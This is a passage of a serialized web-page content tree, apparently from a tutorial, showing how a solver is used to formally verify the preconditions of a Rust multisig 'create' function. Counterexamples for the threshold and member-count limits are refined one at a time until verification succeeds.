ass":245,"line":1262},[23103],{"type":28,"tag":116,"props":23104,"children":23105},{"emptyLinePlaceholder":19},[23106],{"type":33,"value":1044},{"type":28,"tag":116,"props":23108,"children":23109},{"class":245,"line":1294},[23110],{"type":28,"tag":116,"props":23111,"children":23112},{"style":250},[23113],{"type":33,"value":23114},"    // check we don't exceed u16\n",{"type":28,"tag":116,"props":23116,"children":23117},{"class":245,"line":1334},[23118,23122,23127,23131,23135,23139,23143],{"type":28,"tag":116,"props":23119,"children":23120},{"style":376},[23121],{"type":33,"value":2672},{"type":28,"tag":116,"props":23123,"children":23124},{"style":272},[23125],{"type":33,"value":23126}," total_members",{"type":28,"tag":116,"props":23128,"children":23129},{"style":370},[23130],{"type":33,"value":2226},{"type":28,"tag":116,"props":23132,"children":23133},{"style":272},[23134],{"type":33,"value":23047},{"type":28,"tag":116,"props":23136,"children":23137},{"style":370},[23138],{"type":33,"value":141},{"type":28,"tag":116,"props":23140,"children":23141},{"style":282},[23142],{"type":33,"value":8807},{"type":28,"tag":116,"props":23144,"children":23145},{"style":266},[23146],{"type":33,"value":1445},{"type":28,"tag":116,"props":23148,"children":23149},{"class":245,"line":1372},[23150,23154,23158,23162,23166],{"type":28,"tag":116,"props":23151,"children":23152},{"style":260},[23153],{"type":33,"value":11947},{"type":28,"tag":116,"props":23155,"children":23156},{"style":272},[23157],{"type":33,"value":23126},{"type":28,"tag":116,"props":23159,"children":23160},{"style":370},[23161],{"type":33,"value":8391},{"type":28,"tag":116,"props":23163,"children":23164},{"style":350},[23165],{"type":33,"value":4192},{"type":28,"tag":116,"props":23167,"children":23168},{"style":266},[23169],{"type":33,"value":1291},{"type":28,"tag":116,"props":23171,"children":23172},{"class":245,"line":1381},[23173,23177,23182,23186,23191,23195,23200],{"type":28,"tag":116,"props":23174,"children":23175},{"style":260},[23176],{"type":33,"value":15405},{"type":28,"tag":116,"props":23178,"children":23179},{"style":282},[23180],{"type":33,"value":23181}," err!",{"type":28,"tag":116,"props":23183,"children":23184},{"style":266},[23185],{"type":33,"value":313},{"type":28,"tag":116,"props":23187,"children":23188},{"style":339},[23189],{"type":33,"value":23190},"MsError",{"type":28,"tag":116,"props":23192,"children":23193},{"style":370},[23194],{"type":33,"value":3151},{"type":28,"tag":116,"props":23196,"children":23197},{"style":339},[23198],{"type":33,"value":23199},"EmptyMembers",{"type":28,"tag":116,"props":23201,"children":23202},{"style":266},[23203],{"type":33,"value":895},{"type":28,"tag":116,"props":23205,"children":23206},{"class":245,"line":1389},[23207],{"type":28,"tag":116,"props":23208,"children":23209},{"style":266},[23210],{"type":33,"value":3025},{"type":28,"tag":116,"props":23212,"children":23213},{"class":245,"line":1425},[23214],{"type":28,"tag":116,"props":23215,"children":23216},{"emptyLinePlaceholder":19},[23217],{"type":33,"value":1044},{"type":28,"tag":116,"props":23219,"children":23220},{"class":245,"line":1448},[23221],{"type":28,"tag":116,"props":23222,"children":23223},{"style":250},[23224],{"type":33,"value":23225},"    // make sure we don't exceed u16 on first call\n",{"type":28,"tag":116,"props":23227,"children":23228},{"class":245,"line":1456},[23229,23233,23237,23241,23245,23249,23253,23258,23262],{"type":28,"tag":116,"props":23230,"children":23231},{"style":260},[23232],{"type":33,"value":11947},{"type":28,"tag":116,"props":23234,"children":23235},{"style":272},[23236],{"type":33,"value":23126},{"type":28,"tag":116,"props":23238,"children":23239},{"style":370},[23240],{"type":33,"value":13860},{"type":28,"tag":116,"props":23242,"children":23243},{"style":339},[23244],{"type":33,"value":13397},{"type":28,"tag":116,"props":23246,"children":23247},{"style":370},[23248],{"type":33,"value":3151},{"type":28,"tag":116,"props":23250,"children":23251},{"style":282},[23252],{"type":33,"value":19137},{"type":28,"tag":116,"props":23254,"children":23255},{"style":266},[23256],{"type":33,"value":23257},"(u16",{"type":28,"tag":116,"props":23259,"children":23260},{"style":370},[23261],{"type":33,"value":3151},{"type":28,"tag":116,"props":23263,"children":23264},{"style":266},[23265],{"type":33,"value":23266},"MAX) {\n",{"type":28,"tag":116,"props":23268,"children":23269},{"class":245,"line":1520},[23270,23274,23278,23282,23286,23290,23295],{"type":28,"tag":116,"props":23271,"children":23272},{"style":260},[23273],{"type":33,"value":15405},{"type":28,"tag":116,"props":23275,"children":23276},{"style":282},[23277],{"type":33,"value":23181},{"type":28,"tag":116,"props":23279,"children":23280},{"style":266},[23281],{"type":33,"value":313},{"type":28,"tag":116,"props":23283,"children":23284},{"style":339},[23285],{"type":33,"value":23190},{"type":28,"tag":116,"props":23287,"children":23288},{"style":370},[23289],{"type":33,"value":3151},{"type":28,"tag":116,"props":23291,"children":23292},{"style":339},[23293],{"type":33,"value":23294},"MaxMembersReached",{"type":28,"tag":116,"props":23296,"children":23297},{"style":266},[23298],{"type":33,"value":895},{"type":28,"tag":116,"props":23300,"children":23301},{"class":245,"line":1580},[23302],{"type":28,"tag":116,"props":23303,"children":23304},{"style":266},[23305],{"type":33,"value":3025},{"type":28,"tag":116,"props":23307,"children":23308},{"class":245,"line":1620},[23309],{"type":28,"tag":116,"props":23310,"children":23311},{"emptyLinePlaceholder":19},[23312],{"type":33,"value":1044},{"type":28,"tag":116,"props":23314,"children":23315},{"class":245,"line":1668},[23316],{"type":28,"tag":116,"props":23317,"children":23318},{"style":250},[23319],{"type":33,"value":23320},"    // make sure threshold is valid\n",{"type":28,"tag":116,"props":23322,"children":23323},{"class":245,"line":1677},[23324,23328,23332,23336,23340,23344,23348,23353,23357,23362,23366,23370,23374,23378,23382,23387,23392],{"type":28,"tag":116,"props":23325,"children":23326},{"style":260},[23327],{"type":33,"value":11947},{"type":28,"tag":116,"props":23329,"children":23330},{"style":339},[23331],{"type":33,"value":13397},{"type":28,"tag":116,"props":23333,"children":23334},{"style":370},[23335],{"type":33,"value":3151},{"type":28,"tag":116,"props":23337,"children":23338},{"style":282},[23339],{"type":33,"value":19137},{"type":28,"tag":116,"props":23341,"children":23342},{"style":266},[23343],{"type":33,"value":313},{"type":28,"tag":116,"props":23345,"children":23346},{"style":272},[23347],{"type":33,"value":22412},{"type":28,"tag":116,"props":23349,"children":23350},{"style":266},[23351],{"type":33,"value":23352},") \u003C ",{"type":28,"tag":116,"props":23354,"children":23355},{"style":350},[23356],{"type":33,"value":1824},{"type":28,"tag":116,"props":23358,"children":23359},{"style":370},[23360],{"type":33,"value":23361}," ||",{"type":28,"tag":116,"props":23363,"children":23364},{"style":339},[23365],{"type":33,"value":13397},{"type":28,"tag":116,"props":23367,"children":23368},{"style":370},[23369],{"type":33,"value":3151},{"type":28,"tag":116,"props":23371,"children":23372},{"style":282},[23373],{"type":33,"value":19137},{"type":28,"tag":116,"props":23375,"children":23376},{"style":266},[23377],{"type":33,"value":313},{"type":28,"tag":116,"props":23379,"children":23380},{"style":272},[23381],{"type":33,"value":22412},{"type":28,"tag":116,"props":23383,"children":23384},{"style":266},[23385],{"type":33,"value":23386},") > ",{"type":28,"tag":116,"props":23388,"children":23389},{"style":272},[23390],{"type":33,"value":23391},"total_members",{"type":28,"tag":116,"props":23393,"children":23394},{"style":266},[23395],{"type":33,"value":1291},{"type":28,"tag":116,"props":23397,"children":23398},{"class":245,"line":1685},[23399,23403,23407,23411,23415,23419,23424],{"type":28,"tag":116,"props":23400,"children":23401},{"style":260},[23402],{"type":33,"value":15405},{"type":28,"tag":116,"props":23404,"children":23405},{"style":282},[23406],{"type":33,"value":23181},{"type":28,"tag":116,"props":23408,"children":23409},{"style":266},[23410],{"type":33,"value":313},{"type":28,"tag":116,"props":23412,"children":23413},{"style":339},[23414],{"type":33,"value":23190},{"type":28,"tag":116,"props":23416,"children":23417},{"style":370},[23418],{"type":33,"value":3151},{"type":28,"tag":116,"props":23420,"children":23421},{"style":339},[23422],{"type":33,"value":23423},"InvalidThreshold",{"type":28,"tag":116,"props":23425,"children":23426},{"style":266},[23427],{"type":33,"value":895},{"type":28,"tag":116,"props":23429,"children":23430},{"class":245,"line":1729},[23431],{"type":28,"tag":116,"props":23432,"children":23433},{"style":266},[23434],{"type":33,"value":3025},{"type":28,"tag":116,"props":23436,"children":23437},{"class":245,"line":1764},[23438],{"type":28,"tag":116,"props":23439,"children":23440},{"emptyLinePlaceholder":19},[23441],{"type":33,"value":1044},{"type":28,"tag":116,"props":23443,"children":23444},{"class":245,"line":1896},[23445,23449,23453,23457,23461,23466,23470,23474],{"type":28,"tag":116,"props":23446,"children":23447},{"style":272},[23448],{"type":33,"value":19887},{"type":28,"tag":116,"props":23450,"children":23451},{"style":370},[23452],{"type":33,"value":141},{"type":28,"tag":116,"props":23454,"children":23455},{"style":266},[23456],{"type":33,"value":14341},{"type":28,"tag":116,"props":23458,"children":23459},{"style":370},[23460],{"type":33,"value":141},{"type":28,"tag":116,"props":23462,"children":23463},{"style":266},[23464],{"type":33,"value":23465},"multisig",{"type":28,"tag":116,"props":23467,"children":23468},{"style":370},[23469],{"type":33,"value":141},{"type":28,"tag":116,"props":23471,"children":23472},{"style":282},[23473],{"type":33,"value":20404},{"type":28,"tag":116,"props":23475,"children":23476},{"style":266},[23477],{"type":33,"value":3133},{"type":28,"tag":116,"props":23479,"children":23480},{"class":245,"line":1932},[23481,23486],{"type":28,"tag":116,"props":23482,"children":23483},{"style":272},[23484],{"type":33,"value":23485},"        threshold",{"type":28,"tag":116,"props":23487,"children":23488},{"style":266},[23489],{"type":33,"value":3178},{"type":28,"tag":116,"props":23491,"children":23492},{"class":245,"line":1940},[23493,23498],{"type":28,"tag":116,"props":23494,"children":23495},{"style":272},[23496],{"type":33,"value":23497},"        create_key",{"type":28,"tag":116,"props":23499,"children":23500},{"style":266},[23501],{"type":33,"value":3178},{"type":28,"tag":116,"props":23503,"children":23504},{"class":245,"line":1948},[23505,23510],{"type":28,"tag":116,"props":23506,"children":23507},{"style":272},[23508],{"type":33,"value":23509},"        members",{"type":28,"tag":116,"props":23511,"children":23512},{"style":266},[23513],{"type":33,"value":3178},{"type":28,"tag":116,"props":23515,"children":23516},{"class":245,"line":1957},[23517,23521,23525,23529,23534,23538,23542,23546,23551,23555,23559,23563],{"type":28,"tag":116,"props":23518,"children":23519},{"style":370},[23520],{"type":33,"value":7423},{"type":28,"tag":116,"props":23522,"children":23523},{"style":272},[23524],{"type":33,"value":19944},{"type":28,"tag":116,"props":23526,"children":23527},{"style":370},[23528],{"type":33,"value":141},{"type":28,"tag":116,"props":23530,"children":23531},{"style":266},[23532],{"type":33,"value":23533},"bumps",{"type":28,"tag":116,"props":23535,"children":23536},{"style":370},[23537],{"type":33,"value":141},{"type":28,"tag":116,"props":23539,"children":23540},{"style":282},[23541],{"type":33,"value":16013},{"type":28,"tag":116,"props":23543,"children":23544},{"style":266},[23545],{"type":33,"value":313},{"type":28,"tag":116,"props":23547,"children":23548},{"style":563},[23549],{"type":33,"value":23550},"\"multisig\"",{"type":28,"tag":116,"props":23552,"children":23553},{"style":266},[23554],{"type":33,"value":1829},{"type":28,"tag":116,"props":23556,"children":23557},{"style":370},[23558],{"type":33,"value":141},{"type":28,"tag":116,"props":23560,"children":23561},{"style":282},[23562],{"type":33,"value":3336},{"type":28,"tag":116,"props":23564,"children":23565},{"style":266},[23566],{"type":33,"value":3161},{"type":28,"tag":116,"props":23568,"children":23569},{"class":245,"line":1970},[23570],{"type":28,"tag":116,"props":23571,"children":23572},{"style":266},[23573],{"type":33,"value":23574},"    )\n",{"type":28,"tag":116,"props":23576,"children":23577},{"class":245,"line":1987},[23578],{"type":28,"tag":116,"props":23579,"children":23580},{"style":266},[23581],{"type":33,"value":406},{"type":28,"tag":29,"props":23583,"children":23584},{},[23585,23587,23592,23594,23599],{"type":33,"value":23586},"We can start by testing an empty ",{"type":28,"tag":98,"props":23588,"children":23590},{"className":23589},[],[23591],{"type":33,"value":19818},{"type":33,"value":23593}," (this will default to ",{"type":28,"tag":98,"props":23595,"children":23597},{"className":23596},[],[23598],{"type":33,"value":3664},{"type":33,"value":23600},"):",{"type":28,"tag":234,"props":23602,"children":23604},{"code":23603,"language":2651,"meta":7,"className":2652,"style":7},"#[succeeds_if()]\npub fn create(...) { ... }\n",[23605],{"type":28,"tag":98,"props":23606,"children":23607},{"__ignoreMap":7},[23608,23616],{"type":28,"tag":116,"props":23609,"children":23610},{"class":245,"line":246},[23611],{"type":28,"tag":116,"props":23612,"children":23613},{"style":266},[23614],{"type":33,"value":23615},"#[succeeds_if()]\n",{"type":28,"tag":116,"props":23617,"children":23618},{"class":245,"line":256},[23619,23623,23627,23631,23635,23639,23644,23648],{"type":28,"tag":116,"props":23620,"children":23621},{"style":376},[23622],{"type":33,"value":13356},{"type":28,"tag":116,"props":23624,"children":23625},{"style":376},[23626],{"type":33,"value":13361},{"type":28,"tag":116,"props":23628,"children":23629},{"style":282},[23630],{"type":33,"value":6784},{"type":28,"tag":116,"props":23632,"children":23633},{"style":266},[23634],{"type":33,"value":313},{"type":28,"tag":116,"props":23636,"children":23637},{"style":370},[23638],{"type":33,"value":9259},{"type":28,"tag":116,"props":23640,"children":23641},{"style":266},[23642],{"type":33,"value":23643},") { ",{"type":28,"tag":116,"props":23645,"children":23646},{"style":370},[23647],{"type":33,"value":9259},{"type":28,"tag":116,"props":23649,"children":23650},{"style":266},[23651],{"type":33,"value":9264},{"type":28,"tag":29,"props":23653,"children":23654},{},[23655],{"type":33,"value":23656},"Running the solver, we get:",{"type":28,"tag":234,"props":23658,"children":23660},{"code":23659},"...\nVERIFICATION:- FAILED\nVerification Time: 6.404167s\n",[23661],{"type":28,"tag":98,"props":23662,"children":23663},{"__ignoreMap":7},[23664],{"type":33,"value":23659},{"type":28,"tag":29,"props":23666,"children":23667},{},[23668,23670,23675],{"type":33,"value":23669},"This means that ",{"type":28,"tag":98,"props":23671,"children":23673},{"className":23672},[],[23674],{"type":33,"value":3664},{"type":33,"value":23676}," does not imply that the function will succeed (which is expected looking at the implementation above).",{"type":28,"tag":29,"props":23678,"children":23679},{},[23680],{"type":33,"value":23681},"We can ask the solver to produce a counterexample:",{"type":28,"tag":234,"props":23683,"children":23685},{"code":23684},"threshold: 33764\ncreate_key: ...\nmembers: SparseVec { size: 19 }\n",[23686],{"type":28,"tag":98,"props":23687,"children":23688},{"__ignoreMap":7},[23689],{"type":33,"value":23684},{"type":28,"tag":29,"props":23691,"children":23692},{},[23693],{"type":33,"value":23694},"In this case, we can see that the threshold is invalid; it should not be larger than the number of members.",{"type":28,"tag":29,"props":23696,"children":23697},{},[23698],{"type":28,"tag":2583,"props":23699,"children":23700},{},[23701,23703,23709],{"type":33,"value":23702},"Note also that the verifier decided to use a ",{"type":28,"tag":98,"props":23704,"children":23706},{"className":23705},[],[23707],{"type":33,"value":23708},"SparseVec",{"type":33,"value":23710}," which is one of our custom vec implementations. In this case, the code we are verifying doesn't actually read or write to the vector and so we can model it simply as a symbolic size (with no data).",{"type":28,"tag":29,"props":23712,"children":23713},{},[23714],{"type":28,"tag":2583,"props":23715,"children":23716},{},[23717,23719,23724,23725,23731,23733,23738,23740,23745],{"type":33,"value":23718},"Using a sparse vec rather than a concrete vec is generally preferred as it speeds up computation and allows us to model arbitrarily sized vecs. ",{"type":28,"tag":98,"props":23720,"children":23722},{"className":23721},[],[23723],{"type":33,"value":3482},{"type":33,"value":10659},{"type":28,"tag":98,"props":23726,"children":23728},{"className":23727},[],[23729],{"type":33,"value":23730},"pop",{"type":33,"value":23732}," are stubbed out to simply panic for the ",{"type":28,"tag":98,"props":23734,"children":23736},{"className":23735},[],[23737],{"type":33,"value":23708},{"type":33,"value":23739}," and if this code tried to do that we would fall back to the concrete ",{"type":28,"tag":98,"props":23741,"children":23743},{"className":23742},[],[23744],{"type":33,"value":16872},{"type":33,"value":23746}," type.",{"type":28,"tag":29,"props":23748,"children":23749},{},[23750],{"type":33,"value":23751},"We can add this to our constraint and try again:",{"type":28,"tag":234,"props":23753,"children":23755},{"code":23754,"language":2651,"meta":7,"className":2652,"style":7},"#[succeeds_if(\n    (threshold as usize) \u003C= members.len()\n)]\npub fn create(...) { ... }\n",[23756],{"type":28,"tag":98,"props":23757,"children":23758},{"__ignoreMap":7},[23759,23767,23804,23811],{"type":28,"tag":116,"props":23760,"children":23761},{"class":245,"line":246},[23762],{"type":28,"tag":116,"props":23763,"children":23764},{"style":266},[23765],{"type":33,"value":23766},"#[succeeds_if(\n",{"type":28,"tag":116,"props":23768,"children":23769},{"class":245,"line":256},[23770,23775,23779,23783,23787,23791,23795,23799],{"type":28,"tag":116,"props":23771,"children":23772},{"style":266},[23773],{"type":33,"value":23774},"    (threshold ",{"type":28,"tag":116,"props":23776,"children":23777},{"style":376},[23778],{"type":33,"value":8513},{"type":28,"tag":116,"props":23780,"children":23781},{"style":339},[23782],{"type":33,"value":13397},{"type":28,"tag":116,"props":23784,"children":23785},{"style":266},[23786],{"type":33,"value":1609},{"type":28,"tag":116,"props":23788,"children":23789},{"style":370},[23790],{"type":33,"value":19078},{"type":28,"tag":116,"props":23792,"children":23793},{"style":266},[23794],{"type":33,"value":23047},{"type":28,"tag":116,"props":23796,"children":23797},{"style":370},[23798],{"type":33,"value":141},{"type":28,"tag":116,"props":23800,"children":23801},{"style":266},[23802],{"type":33,"value":23803},"len()\n",{"type":28,"tag":116,"props":23805,"children":23806},{"class":245,"line":293},[23807],{"type":28,"tag":116,"props":23808,"children":23809},{"style":266},[23810],{"type":33,"value":19922},{"type":28,"tag":116,"props":23812,"children":23813},{"class":245,"line":361},[23814,23818,23822,23826,23830,23834,23838,23842],{"type":28,"tag":116,"props":23815,"children":23816},{"style":376},[23817],{"type":33,"value":13356},{"type":28,"tag":116,"props":23819,"children":23820},{"style":376},[23821],{"type":33,"value":13361},{"type":28,"tag":116,"props":23823,"children":23824},{"style":282},[23825],{"type":33,"value":6784},{"type":28,"tag":116,"props":23827,"children":23828},{"style":266},[23829],{"type":33,"value":313},{"type":28,"tag":116,"props":23831,"children":23832},{"style":370},[23833],{"type":33,"value":9259},{"type":28,"tag":116,"props":23835,"children":23836},{"style":266},[23837],{"type":33,"value":23643},{"type":28,"tag":116,"props":23839,"children":23840},{"style":370},[23841],{"type":33,"value":9259},{"type":28,"tag":116,"props":23843,"children":23844},{"style":266},[23845],{"type":33,"value":9264},{"type":28,"tag":29,"props":23847,"children":23848},{},[23849],{"type":33,"value":23850},"Verification failed again! This time we get a different counterexample:",{"type":28,"tag":234,"props":23852,"children":23854},{"code":23853},"threshold: 0\ncreate_key: ...\nmembers: SparseVec { size: 19 }\n",[23855],{"type":28,"tag":98,"props":23856,"children":23857},{"__ignoreMap":7},[23858],{"type":33,"value":23853},{"type":28,"tag":29,"props":23860,"children":23861},{},[23862],{"type":33,"value":23863},"Aha! The threshold cannot be 0 either... Let's try again:",{"type":28,"tag":234,"props":23865,"children":23867},{"code":23866,"language":2651,"meta":7,"className":2652,"style":7},"#[succeeds_if(\n    (threshold as usize) \u003C= members.len()\n    && threshold != 0\n)]\npub fn create(...) { ... }\n",[23868],{"type":28,"tag":98,"props":23869,"children":23870},{"__ignoreMap":7},[23871,23878,23913,23934,23941],{"type":28,"tag":116,"props":23872,"children":23873},{"class":245,"line":246},[23874],{"type":28,"tag":116,"props":23875,"children":23876},{"style":266},[23877],{"type":33,"value":23766},{"type":28,"tag":116,"props":23879,"children":23880},{"class":245,"line":256},[23881,23885,23889,23893,23897,23901,23905,23909],{"type":28,"tag":116,"props":23882,"children":23883},{"style":266},[23884],{"type":33,"value":23774},{"type":28,"tag":116,"props":23886,"children":23887},{"style":376},[23888],{"type":33,"value":8513},{"type":28,"tag":116,"props":23890,"children":23891},{"style":339},[23892],{"type":33,"value":13397},{"type":28,"tag":116,"props":23894,"children":23895},{"style":266},[23896],{"type":33,"value":1609},{"type":28,"tag":116,"props":23898,"children":23899},{"style":370},[23900],{"type":33,"value":19078},{"type":28,"tag":116,"props":23902,"children":23903},{"style":266},[23904],{"type":33,"value":23047},{"type":28,"tag":116,"props":23906,"children":23907},{"style":370},[23908],{"type":33,"value":141},{"type":28,"tag":116,"props":23910,"children":23911},{"style":266},[23912],{"type":33,"value":23803},{"type":28,"tag":116,"props":23914,"children":23915},{"class":245,"line":293},[23916,23920,23925,23929],{"type":28,"tag":116,"props":23917,"children":23918},{"style":370},[23919],{"type":33,"value":15283},{"type":28,"tag":116,"props":23921,"children":23922},{"style":266},[23923],{"type":33,"value":23924}," threshold ",{"type":28,"tag":116,"props":23926,"children":23927},{"style":370},[23928],{"type":33,"value":15350},{"type":28,"tag":116,"props":23930,"children":23931},{"style":266},[23932],{"type":33,"value":23933}," 0\n",{"type":28,"tag":116,"props":23935,"children":23936},{"class":245,"line":361},[23937],{"type":28,"tag":116,"props":23938,"children":23939},{"style":266},[23940],{"type":33,"value":19922},{"type":28,"tag":116,"props":23942,"children":23943},{"class":245,"line":387},[23944,23948,23952,23956,23960,23964,23968,23972],{"type":28,"tag":116,"props":23945,"children":23946},{"style":376},[23947],{"type":33,"value":13356},{"type":28,"tag":116,"props":23949,"children":23950},{"style":376},[23951],{"type":33,"value":13361},{"type":28,"tag":116,"props":23953,"children":23954},{"style":282},[23955],{"type":33,"value":6784},{"type":28,"tag":116,"props":23957,"children":23958},{"style":266},[23959],{"type":33,"value":313},{"type":28,"tag":116,"props":23961,"children":23962},{"style":370},[23963],{"type":33,"value":9259},{"type":28,"tag":116,"props":23965,"children":23966},{"style":266},[23967],{"type":33,"value":23643},{"type":28,"tag":116,"props":23969,"children":23970},{"style":370},[23971],{"type":33,"value":9259},{"type":28,"tag":116,"props":23973,"children":23974},{"style":266},[23975],{"type":33,"value":9264},{"type":28,"tag":29,"props":23977,"children":23978},{},[23979],{"type":33,"value":23980},"A third counterexample:",{"type":28,"tag":234,"props":23982,"children":23984},{"code":23983},"threshold: 4\ncreate_key: ...\nmembers: SparseVec { size: 536870920 }\n",[23985],{"type":28,"tag":98,"props":23986,"children":23987},{"__ignoreMap":7},[23988],{"type":33,"value":23983},{"type":28,"tag":29,"props":23990,"children":23991},{},[23992,23994,24000],{"type":33,"value":23993},"Here we see the size of our ",{"type":28,"tag":98,"props":23995,"children":23997},{"className":23996},[],[23998],{"type":33,"value":23999},"members",{"type":33,"value":24001}," vec is huge! We need to constrain that to be less than u16::MAX:",{"type":28,"tag":234,"props":24003,"children":24005},{"code":24004,"language":2651,"meta":7,"className":2652,"style":7},"#[succeeds_if(\n    (threshold as usize) \u003C= members.len()\n    && (threshold != 0)\n    && (members.len() \u003C= (u16::MAX as usize))\n)]\npub fn create(...) { ... }\n",[24006],{"type":28,"tag":98,"props":24007,"children":24008},{"__ignoreMap":7},[24009,24016,24051,24072,24124,24131],{"type":28,"tag":116,"props":24010,"children":24011},{"class":245,"line":246},[24012],{"type":28,"tag":116,"props":24013,"children":24014},{"style":266},[24015],{"type":33,"value":23766},{"type":28,"tag":116,"props":24017,"children":24018},{"class":245,"line":256},[24019,24023,24027,24031,24035,24039,24043,24047],{"type":28,"tag":116,"props":24020,"children":24021},{"style":266},[24022],{"type":33,"value":23774},{"type":28,"tag":116,"props":24024,"children":24025},{"style":376},[24026],{"type":33,"value":8513},{"type":28,"tag":116,"props":24028,"children":24029},{"style":339},[24030],{"type":33,"value":13397},{"type":28,"tag":116,"props":24032,"children":24033},{"style":266},[24034],{"type":33,"value":1609},{"type":28,"tag":116,"props":24036,"children":24037},{"style":370},[24038],{"type":33,"value":19078},{"type":28,"tag":116,"props":24040,"children":24041},{"style":266},[24042],{"type":33,"value":23047},{"type":28,"tag":116,"props":24044,"children":24045},{"style":370},[24046],{"type":33,"value":141},{"type":28,"tag":116,"props":24048,"children":24049},{"style":266},[24050],{"type":33,"value":23803},{"type":28,"tag":116,"props":24052,"children":24053},{"class":245,"line":293},[24054,24058,24063,24067],{"type":28,"tag":116,"props":24055,"children":24056},{"style":370},[24057],{"type":33,"value":15283},{"type":28,"tag":116,"props":24059,"children":24060},{"style":266},[24061],{"type":33,"value":24062}," (threshold ",{"type":28,"tag":116,"props":24064,"children":24065},{"style":370},[24066],{"type":33,"value":15350},{"type":28,"tag":116,"props":24068,"children":24069},{"style":266},[24070],{"type":33,"value":24071}," 0)\n",{"type":28,"tag":116,"props":24073,"children":24074},{"class":245,"line":361},[24075,24079,24083,24087,24091,24095,24099,24104,24108,24112,24116,24120],{"type":28,"tag":116,"props":24076,"children":24077},{"style":370},[24078],{"type":33,"value":15283},{"type":28,"tag":116,"props":24080,"children":24081},{"style":266},[24082],{"type":33,"value":22661},{"type":28,"tag":116,"props":24084,"children":24085},{"style":370},[24086],{"type":33,"value":141},{"type":28,"tag":116,"props":24088,"children":24089},{"style":266},[24090],{"type":33,"value":20684},{"type":28,"tag":116,"props":24092,"children":24093},{"style":370},[24094],{"type":33,"value":19078},{"type":28,"tag":116,"props":24096,"children":24097},{"style":266},[24098],{"type":33,"value":269},{"type":28,"tag":116,"props":24100,"children":24101},{"style":339},[24102],{"type":33,"value":24103},"u16",{"type":28,"tag":116,"props":24105,"children":24106},{"style":370},[24107],{"type":33,"value":3151},{"type":28,"tag":116,"props":24109,"children":24110},{"style":339},[24111],{"type":33,"value":20702},{"type":28,"tag":116,"props":24113,"children":24114},{"style":376},[24115],{"type":33,"value":8500},{"type":28,"tag":116,"props":24117,"children":24118},{"style":339},[24119],{"type":33,"value":13397},{"type":28,"tag":116,"props":24121,"children":24122},{"style":266},[24123],{"type":33,"value":19376},{"type":28,"tag":116,"props":24125,"children":24126},{"class":245,"line":387},[24127],{"type":28,"tag":116,"props":24128,"children":24129},{"style":266},[24130],{"type":33,"value":19922},{"type":28,"tag":116,"props":24132,"children":24133},{"class":245,"line":400},[24134,24138,24142,24146,24150,24154,24158,24162],{"type":28,"tag":116,"props":24135,"children":24136},{"style":376},[24137],{"type":33,"value":13356},{"type":28,"tag":116,"props":24139,"children":24140},{"style":376},[24141],{"type":33,"value":13361},{"type":28,"tag":116,"props":24143,"children":24144},{"style":282},[24145],{"type":33,"value":6784},{"type":28,"tag":116,"props":24147,"children":24148},{"style":266},[24149],{"type":33,"value":313},{"type":28,"tag":116,"props":24151,"children":24152},{"style":370},[24153],{"type":33,"value":9259},{"type":28,"tag":116,"props":24155,"children":24156},{"style":266},[24157],{"type":33,"value":23643},{"type":28,"tag":116,"props":24159,"children":24160},{"style":370},[24161],{"type":33,"value":9259},{"type":28,"tag":116,"props":24163,"children":24164},{"style":266},[24165],{"type":33,"value":9264},{"type":28,"tag":29,"props":24167,"children":24168},{},[24169],{"type":33,"value":24170},"And now we get:",{"type":28,"tag":234,"props":24172,"children":24174},{"code":24173},"VERIFICATION:- SUCCESSFUL\nVerification Time: 6.6634517s\n",[24175],{"type":28,"tag":98,"props":24176,"children":24177},{"__ignoreMap":7},[24178],{"type":33,"value":24173},{"type":28,"tag":29,"props":24180,"children":24181},{},[24182],{"type":33,"value":24183},"🥳🥳🥳",{"type":28,"tag":29,"props":24185,"children":24186},{},[24187],{"type":33,"value":24188},"The attentive reader may have noticed that we didn't need to verify this condition:",{"type":28,"tag":234,"props":24190,"children":24192},{"code":24191,"language":2651,"meta":7,"className":2652,"style":7},"if total_members \u003C 1 {\n    return err!(MsError::EmptyMembers);\n}\n",[24193],{"type":28,"tag":98,"props":24194,"children":24195},{"__ignoreMap":7},[24196,24219,24250],{"type":28,"tag":116,"props":24197,"children":24198},{"class":245,"line":246},[24199,24203,24207,24211,24215],{"type":28,"tag":116,"props":24200,"children":24201},{"style":260},[24202],{"type":33,"value":263},{"type":28,"tag":116,"props":24204,"children":24205},{"style":272},[24206],{"type":33,"value":23126},{"type":28,"tag":116,"props":24208,"children":24209},{"style":370},[24210],{"type":33,"value":8391},{"type":28,"tag":116,"props":24212,"children":24213},{"style":350},[24214],{"type":33,"value":4192},{"type":28,"tag":116,"props":24216,"children":24217},{"style":266},[24218],{"type":33,"value":1291},{"type":28,"tag":116,"props":24220,"children":24221},{"class":245,"line":256},[24222,24226,24230,24234,24238,24242,24246],{"type":28,"tag":116,"props":24223,"children":24224},{"style":260},[24225],{"type":33,"value":393},{"type":28,"tag":116,"props":24227,"children":24228},{"style":282},[24229],{"type":33,"value":23181},{"type":28,"tag":116,"props":24231,"children":24232},{"style":266},[24233],{"type":33,"value":313},{"type":28,"tag":116,"props":24235,"children":24236},{"style":339},[24237],{"type":33,"value":23190},{"type":28,"tag":116,"props":24239,"children":24240},{"style":370},[24241],{"type":33,"value":3151},{"type":28,"tag":116,"props":24243,"children":24244},{"style":339},[24245],{"type":33,"value":23199},{"type":28,"tag":116,"props":24247,"children":24248},{"style":266},[24249],{"type":33,"value":895},{"type":28,"tag":116,"props":24251,"children":24252},{"class":245,"line":293},[24253],{"type":28,"tag":116,"props":24254,"children":24255},{"style":266},[24256],{"type":33,"value":406},{"type":28,"tag":29,"props":24258,"children":24259},{},[24260,24262,24268,24270,24275,24277,24282,24284,24289],{"type":33,"value":24261},"In this case this is actually redundant because if ",{"type":28,"tag":98,"props":24263,"children":24265},{"className":24264},[],[24266],{"type":33,"value":24267},"members.len() == 0",{"type":33,"value":24269}," then our threshold would also have to be ",{"type":28,"tag":98,"props":24271,"children":24273},{"className":24272},[],[24274],{"type":33,"value":353},{"type":33,"value":24276}," (and our ",{"type":28,"tag":98,"props":24278,"children":24280},{"className":24279},[],[24281],{"type":33,"value":22412},{"type":33,"value":24283}," is not allowed to be ",{"type":28,"tag":98,"props":24285,"children":24287},{"className":24286},[],[24288],{"type":33,"value":353},{"type":33,"value":24290},"). The solver realizes that this situation is impossible and therefore the expression we have above is sufficient!",{"type":28,"tag":75,"props":24292,"children":24294},{"id":24293},"_2-verify-threshold-requirements",[24295],{"type":33,"value":24296},"2. Verify threshold requirements",{"type":28,"tag":29,"props":24298,"children":24299},{},[24300],{"type":33,"value":24301},"A critical security property for multisigs is that the threshold should never be zero (which would let anyone issue 